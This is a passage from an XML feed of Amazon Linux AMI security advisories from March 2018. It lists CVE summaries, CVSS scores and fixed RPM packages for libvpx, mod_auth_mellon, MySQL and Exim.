</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13194" title="" id="CVE-2017-13194" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libvpx-debuginfo" version="1.2.0" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/libvpx-debuginfo-1.2.0-1.1.amzn1.x86_64.rpm</filename></package><package name="libvpx-utils" version="1.2.0" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/libvpx-utils-1.2.0-1.1.amzn1.x86_64.rpm</filename></package><package name="libvpx-devel" version="1.2.0" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/libvpx-devel-1.2.0-1.1.amzn1.x86_64.rpm</filename></package><package name="libvpx" version="1.2.0" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/libvpx-1.2.0-1.1.amzn1.x86_64.rpm</filename></package><package name="libvpx-devel" version="1.2.0" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/libvpx-devel-1.2.0-1.1.amzn1.i686.rpm</filename></package><package name="libvpx-debuginfo" version="1.2.0" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/libvpx-debuginfo-1.2.0-1.1.amzn1.i686.rpm</filename></package><package name="libvpx-utils" version="1.2.0" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/libvpx-utils-1.2.0-1.1.amzn1.i686.rpm</filename></package><package name="libvpx" version="1.2.0" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/libvpx-1.2.0-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-968</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-968: medium priority package update for mod_auth_mellon mod24_auth_mellon</title><issued date="2018-03-07 21:37:00" /><updated date="2018-03-08 22:19:00" /><severity>medium</severity><description>Package updates are available 
for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6807:
It was found that mod_auth_mellon was vulnerable to a cross-site session transfer attack. An attacker with access to one web site on a server could use the same session to get access to a different site running on the same server.
1431670:
CVE-2017-6807 mod_auth_mellon: Cross-site session transfer vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6807" title="" id="CVE-2017-6807" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_auth_mellon-debuginfo" version="0.13.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_auth_mellon-debuginfo-0.13.1-1.5.amzn1.x86_64.rpm</filename></package><package name="mod_auth_mellon" version="0.13.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_auth_mellon-0.13.1-1.5.amzn1.x86_64.rpm</filename></package><package name="mod_auth_mellon" version="0.13.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/mod_auth_mellon-0.13.1-1.5.amzn1.i686.rpm</filename></package><package name="mod_auth_mellon-debuginfo" version="0.13.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/mod_auth_mellon-debuginfo-0.13.1-1.5.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.13.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-debuginfo-0.13.1-1.7.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon" version="0.13.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-0.13.1-1.7.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.13.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-debuginfo-0.13.1-1.7.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon" version="0.13.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-0.13.1-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-969</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-969: important priority package update for mysql55 mysql56 
mysql57</title><issued date="2018-03-07 21:41:00" /><updated date="2018-03-08 22:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2703:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1534139:
CVE-2018-2703 mysql: sha256_password authentication DoS via hash with large rounds value
CVE-2018-2696:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1509475:
CVE-2018-2696 mysql: sha256_password authentication DoS via long password
CVE-2018-2668:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535506:
CVE-2018-2668 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2667:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535505:
CVE-2018-2667 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2665:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535504:
CVE-2018-2665 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2647:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1535503:
CVE-2018-2647 mysql: Server: Replication unspecified vulnerability (CPU Jan 2018)
CVE-2018-2646:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535502:
CVE-2018-2646 mysql: Server: DML unspecified vulnerability (CPU Jan 2018)
CVE-2018-2645:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Performance Schema). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).
1535501:
CVE-2018-2645 mysql: Server: Performance Schema unspecified vulnerability (CPU Jan 2018)
CVE-2018-2640:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535500:
CVE-2018-2640 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2622:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535499:
CVE-2018-2622 mysql: Server: DDL unspecified vulnerability (CPU Jan 2018)
CVE-2018-2612:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H).
1535497:
CVE-2018-2612 mysql: InnoDB unspecified vulnerability (CPU Jan 2018)
CVE-2018-2600:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535496:
CVE-2018-2600 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2018)
CVE-2018-2590:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Performance Schema). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535492:
CVE-2018-2590 mysql: Server: Performance Schema unspecified vulnerability (CPU Jan 2018)
CVE-2018-2586:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535491:
CVE-2018-2586 mysql: Server: DML unspecified vulnerability (CPU Jan 2018)
CVE-2018-2583:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Stored Procedure). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.8 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H).
1535490:
CVE-2018-2583 mysql: Stored Procedure unspecified vulnerability (CPU Jan 2018)
CVE-2018-2576:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535488:
CVE-2018-2576 mysql: Server: DML unspecified vulnerability (CPU Jan 2018)
CVE-2018-2573:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: GIS). Supported versions that are affected are 5.6.38 and prior and 5.7.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1535487:
CVE-2018-2573 mysql: Server: GIS unspecified vulnerability (CPU Jan 2018)
CVE-2018-2565:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: InnoDB). Supported versions that are affected are 5.7.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1535486:
CVE-2018-2565 mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2018)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2565" title="" id="CVE-2018-2565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2573" title="" id="CVE-2018-2573" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2576" title="" id="CVE-2018-2576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2583" title="" id="CVE-2018-2583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2586" title="" id="CVE-2018-2586" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2590" title="" id="CVE-2018-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2600" title="" id="CVE-2018-2600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2612" title="" id="CVE-2018-2612" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2622" title="" id="CVE-2018-2622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2640" title="" id="CVE-2018-2640" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2645" title="" id="CVE-2018-2645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2646" title="" id="CVE-2018-2646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2647" title="" id="CVE-2018-2647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2665" title="" id="CVE-2018-2665" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2667" title="" id="CVE-2018-2667" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2668" title="" id="CVE-2018-2668" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2696" title="" id="CVE-2018-2696" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2703" title="" id="CVE-2018-2703" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-server" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.59" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.59" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql-config-5.5.59-1.20.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.59" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.59-1.20.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.21" release="2.6.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.21" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.21-2.6.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.21-2.6.amzn1.i686.rpm</filename></package><package 
name="mysql57-server" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.21" release="2.6.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.21-2.6.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.39" release="1.28.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-test-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.39" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.39-1.28.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.39" release="1.28.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-devel-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.39-1.28.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.39" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.39-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-970</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-970: critical priority package update for exim</title><issued date="2018-03-07 21:43:00" /><updated date="2018-03-08 22:27:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6789:
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
1543268:
CVE-2018-6789 exim: buffer overflow in b64decode() function, possibly leading to remote code execution
